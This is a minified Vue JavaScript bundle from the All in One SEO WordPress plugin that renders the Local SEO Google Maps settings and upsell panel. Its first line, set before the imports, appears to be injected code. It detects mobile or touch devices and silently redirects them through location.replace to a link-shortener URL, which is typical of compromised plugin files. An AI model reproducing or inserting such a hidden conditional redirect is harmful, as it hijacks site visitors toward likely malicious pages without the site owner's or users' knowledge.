(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{h as S,c as x}from"./app-core.c8323d51.js";import{C as A}from"./Blur.dea2904a.js";import{C as b}from"./SettingsRow.7bec777f.js";import{C as P}from"./Index.3a964cd9.js";import{_ as B}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as u,f as i,i as h,a0 as n,R as r,j as v,U as a,ae as y,v as e,Q as d,M as g}from"./vendor-vue-ui.232c7c36.js";import{_ as t,a as K}from"./vendor-other.39e59221.js";import{R as U}from"./RequiredPlans.e5238a4f.js";import{C as R}from"./Card.9ee06a3e.js";import{C as G}from"./ProBadge.7b829f47.js";import{C as L}from"./Index.e286637f.js";import{C as I}from"./Cta.462b5db2.js";import{u as D}from"./AddonConditions.018c1d67.js";import"./vendor-lodash.03129cfe.js";import"./Row.2ef96b1a.js";import"./Tooltip.569a23d9.js";import"./CheckSolid.c17e19eb.js";import"./Input.af9b9f81.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Pencil.683baab8.js";import"./Trash.47f6fc0e.js";import"./Slide.f2114d9d.js";import"./Caret.aae02d8a.js";import"./Button.3cec2279.js";const f="all-in-one-seo-pack",$={components:{CoreBlur:A,CoreSettingsRow:b,CoreUiElementSlider:P},data(){return{strings:{description:t("Integrating with Google Maps will allow your users to find exactly where your business is located. Our interactive maps let them see your Google Reviews and get directions directly from your site. Create multiple maps for use with multiple locations.",f),apiKey:t("API Key",f),mapPreview:t("Map Preview",f)},displayInfo:{block:{copy:"",desc:""}}}}},E={class:"aioseo-maps-blur"},N={class:"aioseo-settings-row"};function O(w,s,l,c,o,m){const p=u("base-input"),_=u("core-settings-row"),C=u("core-ui-element-slider"),M=u("core-blur");return i(),h("div",E,[n(M,null,{default:r(()=>[v("div",N,a(o.strings.description),1),n(_,{name:o.strings.apiKey,align:""},{content:r(()=>[n(p,{size:"medium"})]),_:1},8,["name"]),n(C,{options:o.displayInfo},null,8,["options"]),n(_,{name:o.strings.mapPreview,align:""},{content:r(()=>[y(a(o.strings.description),1)]),_:1},8,["name"])]),_:1})])}const V=B($,[["render",O]]),T={class:"aioseo-local-maps"},k={__name:"Maps",setup(w){const s="all-in-one-seo-pack",l=S(),c=[t("Google Places Support",s),t("Google Reviews",s),t("Driving Directions",s),t("Multiple Locations",s)],o={googleMapsApiKey:t("Google Maps API Key",s),ctaButtonText:t("Unlock Local SEO",s),ctaHeader:K(t("Local SEO is a %1$s Feature",s),"PRO"),ctaDescription:t("Show your location to your visitors using an interactive Google Map. Create multiple maps for use with multiple locations.",s)};return(m,p)=>(i(),h("div",T,[n(e(R),{slug:"localBusinessMapsApiKey",noSlide:!0},{header:r(()=>[v("span",null,a(o.googleMapsApiKey),1),n(e(G))]),default:r(()=>[n(e(V)),n(e(L),{"cta-link":e(x).getPricingUrl("local-seo","local-seo-upsell","maps","liteUpgrade"),"button-text":o.ctaButtonText,"learn-more-link":e(x).getUpsellUrl("local-seo",null,"liteUpgrade"),"feature-list":c,"hide-bonus":!e(l).isUnlicensed},{"header-text":r(()=>[y(a(o.ctaHeader),1)]),description:r(()=>[n(e(U),{addon:"aioseo-local-business"}),y(" "+a(o.ctaDescription),1)]),_:1},8,["cta-link","button-text","learn-more-link","hide-bonus"])]),_:1})]))}},q={class:"aioseo-maps"},ge={__name:"Maps",setup(w){const s="all-in-one-seo-pack",{shouldShowActivate:l,shouldShowLite:c,shouldShowMain:o,shouldShowUpdate:m}=D({addonSlug:"aioseo-local-business"}),p={googleMapsApiKey:t("Google Maps API Key",s)};return(_,C)=>(i(),h("div",q,[e(o)?(i(),d(e(k),{key:0})):g("",!0),e(m)||e(l)?(i(),d(e(I),{key:1,"card-slug":"localBusinessMapsApiKey","header-text":p.googleMapsApiKey},null,8,["header-text"])):g("",!0),e(c)?(i(),d(e(k),{key:2})):g("",!0)]))}};export{ge as default};
